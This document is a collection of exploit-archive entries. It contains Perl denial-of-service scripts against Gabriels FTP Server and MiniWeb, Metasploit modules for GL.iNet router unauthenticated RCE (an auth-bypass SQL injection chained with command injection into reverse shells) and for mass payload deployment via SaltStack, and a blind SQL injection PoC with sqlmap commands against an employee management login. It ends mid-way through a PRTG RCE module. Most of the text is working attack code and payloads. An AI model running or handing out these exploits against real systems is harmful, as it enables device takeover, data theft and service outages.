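#!/usr/bin/perl
#
# Exploit Title: Gabriels FTP Server 1.2 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 25 january 2024
# Vendor Homepage: N/A
# Download to demo: https://drive.google.com/file/d/1k8QxfP6x908E-1QpRAVulKoAM9OEo1a8/view?usp=sharing
# Notification vendor: No reported
# Tested Version: Gabriels FTP Server 1.2
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Vídeo: https://www.youtube.com/watch?v=wwHuXfYS8yQ
#
# 1. Description
#
# The server does not bound the length of the argument it accepts for the
# FTP USER command. When a client "authenticates" with a USER line several
# kilobytes long, the server crashes as soon as the line is received and
# parsed, denying service to legitimate users until it is restarted.
# Only a crash has been demonstrated (see the video above). Nothing in this
# PoC controls execution, so no code-execution claim is made here.
#
# 2. Proof of Concept - PoC
#
# Usage: perl <this script> <ip> <port>
#
# The script connects, reads the greeting, sends one oversized USER line,
# then probes the port again to report whether the service actually went
# down instead of unconditionally printing "success".
#
# 3. Solution / How to fix:
#
# This product version is deprecated and no vendor fix is known. Do not
# expose the service; replace it with a maintained FTP server.

use strict;
use warnings;
use IO::Socket::INET;

# Target host and port, parsed from @ARGV by main(); file-scoped so the
# PoC body below can use them.
my ($ip, $port);

clear_screen();
intro();
main();

print "[+] Exploiting...\n";

# "A,A B" repeated 500 times (2500 bytes) -- exactly the bytes the original
# PoC sent. Any sufficiently long USER argument is expected to do.
my $payload = "\x41\x2C\x41\x20\x42" x 500;

my $ftp_socket = IO::Socket::INET->new(
    PeerAddr => $ip,
    PeerPort => $port,
    Proto    => 'tcp',
    Timeout  => 10,
) or die "Não foi possível se conectar ao servidor.";

# Consume the 220 greeting before sending the command, as the original PoC
# did; the banner content itself is irrelevant to the crash.
my $banner = <$ftp_socket>;

print $ftp_socket "USER $payload\r\n";
close $ftp_socket;

# Do not claim success blindly: if the server really crashed, a fresh
# connection attempt a moment later must fail.
sleep 2;
if (service_alive($ip, $port)) {
    print "[-] Done - the server still accepts connections; no crash observed\n\n";
} else {
    print "[+] Done - the server no longer accepts connections (DoS confirmed)\n\n";
}

# Clear the terminal. $^O is 'MSWin32' on Windows, never 'windows', which is
# the comparison the original PoC got wrong (it always ran 'clear').
sub clear_screen {
    my $cmd = $^O eq 'MSWin32' ? 'cls' : 'clear';
    system($cmd);
    return;
}

# Print the banner.
sub intro {
    print "######################################################################\n";
    print "# Gabriels FTP Server 1.2 - Denied of Service #\n";
    print "# #\n";
    print "# Coded by Fernando Mengali #\n";
    print "# #\n";
    print "# e-mail: fernando.mengalli\@gmail.com #\n";
    print "# #\n";
    print "######################################################################\n";
    return;
}

# Parse <ip> <port> from the command line; exit with usage when either is
# missing or the port is not a number.
sub main {
    ($ip, $port) = @ARGV;

    unless (defined($ip) && defined($port) && $port =~ /\A\d+\z/) {
        print " \nUsage: $0 <ip> <port> \n";
        exit(-1);
    }
    return;
}

# True when a TCP connection to host:port can still be established.
sub service_alive {
    my ($host, $p) = @_;
    my $probe = IO::Socket::INET->new(
        PeerAddr => $host,
        PeerPort => $p,
        Proto    => 'tcp',
        Timeout  => 5,
    ) or return 0;
    close $probe;
    return 1;
}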
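##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'digest/md5'

# GL.iNet 4.x routers: command injection in the `logread` RPC module
# (CVE-2023-50445), chained with the CVE-2023-50919 login bypass so that no
# valid credentials are needed. See the References for the original research.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'GL.iNet Unauthenticated Remote Command Execution via the logread module.',
        'Description' => %q{
          A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker
          to inject and execute arbitrary shell commands via JSON parameters at the `gl_system_log` and `gl_crash_log`
          interface in the `logread` module.
          This exploit requires post-authentication using the `Admin-Token` cookie/sessionID (`SID`), typically stolen
          by the attacker.
          However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication
          through a `Lua` string pattern matching and SQL injection vulnerability. The `Admin-Token` cookie/`SID` can be
          retrieved without knowing a valid username and password.

          The following GL.iNet network products are vulnerable:
          - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A: v4.0.0 < v4.5.0;
          - MT6000: v4.5.0 - v4.5.3;
          - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;
          - E750/E750V2, MV1000: v4.3.8;
          - X3000: v4.0.0 - v4.4.2;
          - XE3000: v4.0.0 - v4.4.3;
          - SFT1200: v4.3.6;
          - and potentially others (just try ;-)

          NOTE: Staged Meterpreter payloads might core dump on the target, so use stage-less Meterpreter payloads
          when using the Linux Dropper target.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
          'Unknown', # Discovery of the vulnerability CVE-2023-50445
          'DZONERZY' # Discovery of the vulnerability CVE-2023-50919
        ],
        'References' => [
          ['CVE', '2023-50445'],
          ['CVE', '2023-50919'],
          ['URL', 'https://attackerkb.com/topics/3LmJ0d7rzC/cve-2023-50445'],
          ['URL', 'https://attackerkb.com/topics/LdqSuqHKOj/cve-2023-50919'],
          ['URL', 'https://libdzonerzy.so/articles/from-zero-to-botnet-glinet.html'],
          ['URL', 'https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md']
        ],
        'DisclosureDate' => '2023-12-10',
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_netcat'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne'],
              'Linemax' => 900,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options([
      OptString.new('SID', [false, 'Session ID'])
    ])
  end

  # "Product info: <model>|<firmware>|<arch>" as filled in by vuln_version?,
  # used by every CheckCode message.
  def product_info
    "Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}"
  end

  # Fingerprint the device (model + firmware) through the unauthenticated
  # 4.x `ui.check_initialized` RPC, falling back to the 3.x
  # `/cgi-bin/api/router/hello` endpoint, and decide whether the firmware is in
  # a vulnerable range. Side effect: populates @glinet (model, firmware, arch).
  # @glinet['arch'] is left at 'n/a' only for a model this module does not know.
  def vuln_version?
    @glinet = { 'model' => nil, 'firmware' => nil, 'arch' => nil }

    # check first with version 4.x api call
    post_data = {
      jsonrpc: '2.0',
      id: rand(1000..9999),
      method: 'call',
      params: [
        '',
        'ui',
        'check_initialized',
        {}
      ]
    }.to_json

    res = send_request_cgi({
      'method' => 'POST',
      'ctype' => 'text/json',
      'uri' => normalize_uri(target_uri.path, 'rpc'),
      'data' => post_data.to_s
    })
    if res && res.code == 200 && res.body.include?('result')
      res_json = res.get_json_document
      unless res_json.blank?
        # dig: a 'result' that is not an object must not raise in check()
        @glinet['model'] = res_json.dig('result', 'model')
        @glinet['firmware'] = res_json.dig('result', 'firmware_version')
      end
    else
      # check with version 3.x api call. These versions are NOT vulnerable
      res = send_request_cgi({
        'method' => 'GET',
        'ctype' => 'application/x-www-form-urlencoded',
        'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'api', 'router', 'hello')
      })
      if res && res.code == 200 && res.body.include?('model') && res.body.include?('version')
        res_json = res.get_json_document
        unless res_json.blank?
          @glinet['model'] = res_json['model']
          @glinet['firmware'] = res_json['version']
        end
      end
    end

    # Without a firmware string there is nothing to compare (and Rex::Version
    # rejects an empty one); check() reports Unknown in that case.
    return false if @glinet['firmware'].blank?

    fw = Rex::Version.new(@glinet['firmware'])

    # check for the vulnerable models and firmware versions
    case @glinet['model']
    when 'sft1200'
      @glinet['arch'] = 'mipsle'
      return fw == Rex::Version.new('4.3.6')
    when 'ar750', 'ar750s', 'ar300m', 'ar300m16'
      @glinet['arch'] = 'mipsbe'
      return fw == Rex::Version.new('4.3.7')
    when 'mt300n-v2', 'mt1300'
      @glinet['arch'] = 'mipsle'
      return fw == Rex::Version.new('4.3.7')
    when 'ap1300', 'b1300'
      @glinet['arch'] = 'armle'
      return fw == Rex::Version.new('4.3.7')
    when 'e750', 'e750v2'
      @glinet['arch'] = 'mipsbe'
      return fw == Rex::Version.new('4.3.8')
    when 'mv1000'
      @glinet['arch'] = 'armle'
      return fw == Rex::Version.new('4.3.8')
    when 'ax1800', 'axt1800', 'a1300'
      @glinet['arch'] = 'armle'
      return fw >= Rex::Version.new('4.0.0') && fw < Rex::Version.new('4.5.0')
    when 'mt2500', 'mt2500a', 'mt3000'
      @glinet['arch'] = 'aarch64'
      return fw >= Rex::Version.new('4.0.0') && fw < Rex::Version.new('4.5.0')
    when 'mt6000'
      @glinet['arch'] = 'aarch64'
      return fw >= Rex::Version.new('4.5.0') && fw <= Rex::Version.new('4.5.3')
    when 'x3000'
      @glinet['arch'] = 'aarch64'
      return fw >= Rex::Version.new('4.0.0') && fw <= Rex::Version.new('4.4.2')
    when 'xe3000'
      @glinet['arch'] = 'aarch64'
      return fw >= Rex::Version.new('4.0.0') && fw <= Rex::Version.new('4.4.3')
    end

    @glinet['arch'] = 'n/a'
    return false
  end

  # Obtain an `Admin-Token` session ID. Uses the operator-supplied SID when
  # set; otherwise exploits CVE-2023-50919 (Lua pattern + SQL injection in the
  # login handler) so that a crafted username logs in as root with a
  # predictable password. Aborts the module if either RPC step fails instead
  # of returning nil, which would make every later request fail silently.
  def auth_bypass
    # Check if datastore['SID'] is set
    return datastore['SID'] unless datastore['SID'].blank?

    # Exploit CVE-2023-50919 to retrieve the SID without valid username and password.
    # Send an RPC request calling the challenge method, which will return a random nonce,
    # the selected root user’s salt, and the crypt’s algorithm to hash the password.
    post_data = {
      jsonrpc: '2.0',
      id: rand(1000..9999),
      method: 'challenge',
      params: {
        username: 'root'
      }
    }.to_json

    res = send_request_cgi({
      'method' => 'POST',
      'ctype' => 'text/json',
      'uri' => normalize_uri(target_uri.path, 'rpc'),
      'data' => post_data.to_s
    })
    nonce = nil
    if res && res.code == 200 && res.body.include?('nonce')
      res_json = res.get_json_document
      nonce = res_json.dig('result', 'nonce') unless res_json.blank?
    end
    fail_with(Failure::NotFound, 'Getting the random nonce failed.') if nonce.blank?

    # Perform REGEX to lookup uid field from /etc/shadow to be used as password with manipulated root username
    # Use the SQL injection part to lookup the ACLs for root stored in sqlite db
    # Create the password hash which is the md5 of the concatenation of the user, password, and the retrieved nonce
    username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+"
    pw = '0'
    hash = Digest::MD5.hexdigest("#{username}:#{pw}:#{nonce}")

    # Login with the password hash and obtain the SessionID (SID)
    post_data = {
      jsonrpc: '2.0',
      id: rand(1000..9999),
      method: 'login',
      params: {
        username: username.to_s,
        hash: hash.to_s
      }
    }.to_json

    res = send_request_cgi({
      'method' => 'POST',
      'ctype' => 'text/json',
      'uri' => normalize_uri(target_uri.path, 'rpc'),
      'data' => post_data.to_s
    })
    sid = nil
    if res && res.code == 200 && res.body.include?('sid')
      res_json = res.get_json_document
      sid = res_json.dig('result', 'sid') unless res_json.blank?
    end
    fail_with(Failure::NotFound, 'Retrieving the SessionID (SID) failed.') if sid.blank?

    return sid
  end

  # Run `cmd` on the device through the `logread.get_system_log` RPC. The
  # `module` parameter is passed unsanitised to a shell; a leading `|` pipes
  # our command in. The command is base64-wrapped so that the arbitrary bytes
  # of a payload never reach the injection point unescaped.
  # Returns the raw HTTP response (the server does not echo command output).
  def execute_command(cmd, _opts = {})
    encoded_cmd = Base64.strict_encode64(cmd)
    cmd = "echo #{encoded_cmd}|openssl enc -base64 -d -A|sh"
    post_data = {
      jsonrpc: '2.0',
      id: rand(1000..9999),
      method: 'call',
      params: [
        @sid.to_s,
        'logread',
        'get_system_log',
        {
          lines: '',
          module: "|#{cmd}"
        }
      ]
    }.to_json

    return send_request_cgi({
      'method' => 'POST',
      'ctype' => 'text/json',
      'cookie' => "Admin-Token=#{@sid}",
      'uri' => normalize_uri(target_uri.path, 'rpc'),
      'data' => post_data.to_s
    })
  end

  # Vulnerable: model + firmware are in a known vulnerable range.
  # Safe:       3.x firmware, or a known model on a 4.x firmware outside the
  #             vulnerable ranges.
  # Detected:   unknown model on 4.x firmware (may still be vulnerable).
  # Unknown:    no model/firmware could be read.
  def check
    print_status("Checking if #{peer} can be exploited.")
    # Check if target is a GL.iNet network device and the firmware version is vulnerable
    return CheckCode::Vulnerable(product_info) if vuln_version?

    # No GL.iNet network device or not reachable
    if @glinet['firmware'].blank?
      return CheckCode::Unknown('No GL.iNet network device or device is not responding.')
    end

    fw = Rex::Version.new(@glinet['firmware'])

    # GL.iNet network devices with firmware version 3.x that are safe from this exploit
    return CheckCode::Safe(product_info) if fw < Rex::Version.new('4.0.0')

    # 4.x firmware: vuln_version? leaves arch at 'n/a' only for a model it does
    # not know, so a known model that got here is outside the vulnerable ranges.
    return CheckCode::Safe(product_info) if @glinet['arch'] != 'n/a'

    # Unknown model on a 4.x firmware which still could be vulnerable
    CheckCode::Detected(product_info)
  end

  def exploit
    @sid = auth_bypass
    print_status("SID: #{@sid}")
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      # Don't check the response here since the server won't respond
      # if the payload is successfully executed.
      execute_cmdstager({ linemax: target.opts['Linemax'] })
    end
  end
end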
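##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Abuses an existing session on a SaltStack master: the master's own
# `salt-cp` / `salt ... cmd.run` are used to push a payload to every accepted
# minion matched by MINIONS and run it. Not an exploit of a Salt bug; it is
# the master's legitimate authority over its minions.
class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Local::Saltstack

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Saltstack Minion Payload Deployer',
        'Description' => %q{
          This exploit module uses saltstack salt to deploy a payload and run it
          on all targets which have been selected (default all).
          Currently only works against nix targets.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
          'c2Vlcgo'
        ],
        'Platform' => [ 'linux', 'unix' ],
        'Stance' => Msf::Exploit::Stance::Passive,
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' => [[ 'Auto', {} ]],
        'Privileged' => true,
        'References' => [],
        'DisclosureDate' => '2011-03-19', # saltstack salt original release date
        'DefaultTarget' => 0,
        'Passive' => true, # this allows us to get multiple shells calling home
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options [
      OptString.new('SALT', [true, 'salt-master executable location', '']),
      OptString.new('MINIONS', [true, 'Minions Target', '*']),
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
      OptString.new('TargetWritableDir', [ true, 'A directory where we can write and execute files on targets', '/tmp' ]),
      OptBool.new('CALCULATE', [ true, 'Calculate how many boxes will be attempted', true ]),
      OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions', 60 ]),
      OptInt.new('TIMEOUT', [true, 'Timeout for salt commands to run in seconds', 120])
    ]
  end

  # Path of the salt-master executable on the session host: the SALT option
  # first, then the usual install locations. nil when none is executable.
  # Memoised in @salt.
  def salt_master
    return @salt if @salt

    [datastore['SALT'], '/usr/bin/salt-master', '/usr/local/bin/salt-master'].each do |exec|
      next unless executable?(exec)

      @salt = exec
      return @salt
    end
    @salt
  end

  # Print the accepted minions as a table and return how many there are
  # (nil when list_minions, from the Saltstack mixin, returned nothing).
  # Pauses 10 seconds so the operator can abort a deployment that is about
  # to hit far more hosts than intended.
  def list_minions_printer
    minions = list_minions
    return if minions.nil?

    tbl = Rex::Text::Table.new(
      'Header' => 'Minions List',
      'Indent' => 1,
      'Columns' => ['Status', 'Minion Name']
    )

    count = 0
    minions['minions'].each do |minion|
      tbl << ['Accepted', minion]
      count += 1
    end

    print_good(tbl.to_s)

    # https://github.com/rapid7/metasploit-framework/pull/18626#discussion_r1434577017
    print_good("#{count} minions were found in the accepted state, and will attempt to execute payload. If this isn't an expected volume (too many), ctr+c to halt execution. Pausing 10 seconds.")
    Rex.sleep(10)
    count
  end

  def check
    return CheckCode::Safe('salt-master does not seem to be installed, unable to find salt-master executable') if salt_master.nil?

    CheckCode::Vulnerable('salt-master executable found')
  end

  # 1. write the base64 of the payload ELF to WritableDir on the master,
  # 2. salt-cp it to TargetWritableDir/<name>.b64 on every matched minion,
  # 3. salt cmd.run: decode, chmod 755 and execute it,
  # 4. wait up to ListenerTimeout seconds for sessions to call home.
  # The payload file name is kept in @payload_name so on_new_session can
  # remove the artifacts from each minion that connects back.
  def exploit
    # Make sure we can write our exploit and payload to the local system
    fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" unless writable? datastore['WritableDir']

    # These three options are spliced into single-quoted shell arguments
    # below; a quote in any of them would break out of that quoting.
    %w[MINIONS WritableDir TargetWritableDir].each do |opt|
      fail_with Failure::BadConfig, "#{opt} must not contain a single quote" if datastore[opt].to_s.include?("'")
    end

    count = 1 # default to running if we decide not to calculate
    count = list_minions_printer if datastore['CALCULATE']
    fail_with Failure::NotFound, 'No exploitable minions found.' if count == 0

    @payload_name = rand_text_alphanumeric(5..10)
    local_path = "#{datastore['WritableDir']}/#{@payload_name}"
    remote_b64 = "#{datastore['TargetWritableDir']}/#{@payload_name}.b64"
    remote_exe = "#{datastore['TargetWritableDir']}/#{@payload_name}"

    # due to a bug in older (2021) versions of salt-cp, we need to write ascii files. https://github.com/saltstack/salt/issues/59899
    upload_and_chmodx local_path, Rex::Text.encode_base64(generate_payload_exe)

    # Salt fans out to every minion, so the default cmd_exec timeout is far
    # too short; TIMEOUT is the option registered for exactly this.
    salt_timeout = datastore['TIMEOUT'].to_i

    print_status('Copying payload to minions')
    cmd_exec("salt-cp '#{datastore['MINIONS']}' '#{local_path}' '#{remote_b64}'", nil, salt_timeout)
    print_status('Executing payloads')
    cmd_exec("salt '#{datastore['MINIONS']}' cmd.run 'base64 -d #{remote_b64} > #{remote_exe} && chmod 755 #{remote_exe} && #{remote_exe}'", nil, salt_timeout)

    # stolen from exploit/multi/handler
    stime = Time.now.to_f
    timeout = datastore['ListenerTimeout'].to_i
    loop do
      break if timeout > 0 && (stime + timeout < Time.now.to_f)

      Rex::ThreadSafe.sleep(1)
    end

    # The master-side copy has already been distributed; do not leave it behind.
    print_status("Removing #{local_path} from the salt master")
    rm_f(local_path)
  end

  # Called once per minion that connects back: delete the dropped .b64 and
  # the executable from that minion. Uses the new session itself, so it
  # works whether the payload produced a meterpreter or a plain shell.
  def on_new_session(session)
    super

    exe = "#{datastore['TargetWritableDir']}/#{@payload_name}"
    b64 = "#{exe}.b64"

    begin
      if session.type == 'meterpreter'
        session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
        [exe, b64].each do |path|
          print_warning("Deleting: #{path}")
          session.fs.file.rm(path)
          print_good("#{path} removed")
        end
      else
        # command shell session (CommandShell API)
        print_warning("Deleting: #{exe} and #{b64}")
        session.shell_command_token("rm -f '#{exe}' '#{b64}'")
        print_good("#{exe} and #{b64} removed")
      end
    rescue StandardError => e
      print_error("Unable to delete #{exe} / #{b64}: #{e.message}")
    end
  end
end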
<pre><code># Exploit Title: Employee Management System 1.0 - Time-Based Blind SQL Injection (login.php, unauthenticated)<br /># Date: 23/03/2024<br /># Exploit Author: Özlem Balcı<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link:<br />https://www.sourcecodester.com/php/16999/employee-management-system.html<br /># Software Download:<br />https://www.sourcecodester.com/download-code?nid=16999&title=Employee+Management+System+using+PHP+and+MySQL<br /># Version: 1.0<br /># Tested on: Mac OS<br /><br />## Description<br />A time-based blind SQL injection vulnerability in the login page<br />(/employee_akpoly/Account/login.php) of Employee Management System 1.0 allows<br />remote, unauthenticated attackers to execute arbitrary SQL statements against the<br />application's MySQL database through the "txtemail" POST parameter, which is<br />evidently embedded in the login query without parameterization (the injected<br />SLEEP() below measurably delays the response). Blind SQL injection allows reading<br />the database (e.g. credentials) and, depending on the database account's<br />privileges, further compromise; no direct OS command execution is demonstrated here.<br />Fix: bind "txtemail" and "txtpassword" as prepared-statement parameters instead<br />of concatenating them into the query.<br /><br />## Request PoC<br /><br />Baseline request (no injection):<br /><br />POST /employee_akpoly/Account/login.php HTTP/1.1<br />Host: localhost<br />Content-Length: 55<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "macOS"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/employee_akpoly/Account/login.php<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: PHPSESSID=1af7jipa5jq7ak8ifd09bgtokf<br />Connection: close<br /><br />txtemail=test%40test.com&txtpassword=12345A&E&btnlogin=<br /><br />This baseline request simply fails the login and is answered without delay. 
Adding ' AND (SELECT 2092 FROM<br />(SELECT(SLEEP(11)))DZSD) AND 'yLcd'='yLcd&txtpassword=123456AE to the end<br />of "txtemail" parameter, the response to request was 302 status code with<br />message of Found, but 11 seconds later, which indicates that our sleep 11<br />command works.<br /><br />POST /employee_akpoly/Account/login.php HTTP/1.1<br />Host: localhost<br />Content-Length: 117<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "macOS"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/employee_akpoly/Account/login.php<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: PHPSESSID=1af7jipa5jq7ak8ifd09bgtokf<br />Connection: close<br /><br />txtemail=test@test.com' AND (SELECT 2092 FROM (SELECT(SLEEP(11)))DZSD) AND<br />'yLcd'='yLcd&txtpassword=123456AE&btnlogin<br /><br /><br />sqlmap -r emp.txt --risk=3 --level=3 --dbms=mysql --is-dba --users<br />--privileges --role<br /><br />Parameter: txtemail (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: txtemail=test@test.com' AND (SELECT 2092 FROM<br />(SELECT(SLEEP(5)))DZSD) AND 'yLcd'='yLcd&txtpassword=123456AE&btnlogin=[image:<br />Employee Management System 1.png][image: Employee Management System2.png]<br /></code></pre>
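#!/usr/bin/perl
#
# Exploit Title: MiniWeb HTTP Server 0.8.19 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 24 january 2024
# Vendor Homepage: N/A
# Download to demo: https://drive.google.com/file/d/1935vpOZJPFJqnwTMPdkXTvoblA1SzBEK/view?usp=sharing
# Notification vendor: No reported
# Tested Version: MiniWeb HTTP Server 0.8.19
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Vídeo: https://www.youtube.com/watch?v=2yVPUO-rl1E
#
# 1. Description
#
# The web server does not bound the amount of request data it accepts.
# A POST whose body is a few kilobytes of 'A' crashes the server as soon as
# the request is received and processed, denying service to legitimate users
# until the server is restarted. Only a crash has been demonstrated (see the
# video above); nothing in this PoC controls execution.
#
# 2. Proof of Concept - PoC
#
# Usage: perl <this script> <ip> <port>
#
# The original PoC connected to $host, a variable that is never assigned
# (the parsed argument is $ip), so it could never reach the target; that is
# fixed here. The request bytes themselves are kept exactly as in the
# original, including the deliberately missing Content-Length header, so
# the reproduction is unchanged.

use strict;
use warnings;
use IO::Socket;

# Target host and port, parsed from @ARGV by main(); file-scoped so the
# PoC body below can use them.
my ($ip, $port);

clear_screen();
intro();
main();

print "[+] Exploiting...\n";

# 2038 bytes of 'A' as the POST body -- the same size the original PoC used.
my $payload = "\x41" x 2038;

my $http_req = "POST /index.html HTTP/1.1\r\n";
$http_req .= "Host: $ip\r\n";
$http_req .= "From: header-data\r\n";
$http_req .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
$http_req .= $payload;

my $socket = IO::Socket::INET->new(
    PeerAddr => $ip,
    PeerPort => $port,
    Proto    => 'tcp',
) or die "[-] Could not connect\n";

$socket->send($http_req);
$socket->close();

# Do not claim success blindly: if the server really crashed, a fresh
# connection attempt a moment later must fail.
sleep 2;
if (service_alive($ip, $port)) {
    print "[-] Done - the server still accepts connections; no crash observed\n\n";
} else {
    print "[+] Done - the server no longer accepts connections (DoS confirmed)\n\n";
}

# Clear the terminal. $^O is 'MSWin32' on Windows, never 'windows', which is
# the comparison the original PoC got wrong (it always ran 'clear').
sub clear_screen {
    my $cmd = $^O eq 'MSWin32' ? 'cls' : 'clear';
    system($cmd);
    return;
}

# Print the banner (q{} so the '@' in the address is not interpolated).
sub intro {
    print q {


                _/|
               // o\
               || ._)
               //__\
               )___(

 [+] MiniWeb HTTP Server 0.8.19 - Denied of Service (DoS)

 [*] Coded by Fernando Mengali

 [@] e-mail: fernando.mengalli@gmail.com

 };
    return;
}

# Parse <ip> <port> from the command line; exit with usage when either is
# missing or the port is not a number.
sub main {
    ($ip, $port) = @ARGV;

    unless (defined($ip) && defined($port) && $port =~ /\A\d+\z/) {
        print " \nUsage: $0 <ip> <port> \n";
        exit(-1);
    }
    return;
}

# True when a TCP connection to host:port can still be established.
sub service_alive {
    my ($host, $p) = @_;
    my $probe = IO::Socket::INET->new(
        PeerAddr => $host,
        PeerPort => $p,
        Proto    => 'tcp',
        Timeout  => 5,
    ) or return 0;
    close $probe;
    return 1;
}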
<pre><code>class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::Retry<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'PRTG CVE-2023-32781 Authenticated RCE',<br /> 'Description' => %q{<br /> Authenticated RCE in Paessler PRTG<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => ['Kevin Joensen <kevin[at]baldur.dk>'],<br /> 'References' => [<br /> [ 'URL', 'https://baldur.dk/blog/prtg-rce.html'],<br /> [ 'CVE', '2023-32781']<br /> ],<br /> 'DisclosureDate' => '2023-08-09',<br /> 'Platform' => 'win',<br /> 'Arch' => [ ARCH_X86, ARCH_X64 ],<br /> 'Targets' => [<br /> [<br /> 'Windows_Fetch',<br /> {<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Platform' => 'win',<br /> 'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },<br /> 'Type' => :win_fetch<br /> }<br /> ],<br /> [<br /> 'Windows_CMDStager',<br /> {<br /> 'Arch' => [ ARCH_X64, ARCH_X86 ],<br /> 'Platform' => 'win',<br /> 'Type' => :win_cmdstager,<br /> 'CmdStagerFlavor' => [ 'psh_invokewebrequest' ]<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /><br /> 'DefaultOptions' => {},<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> 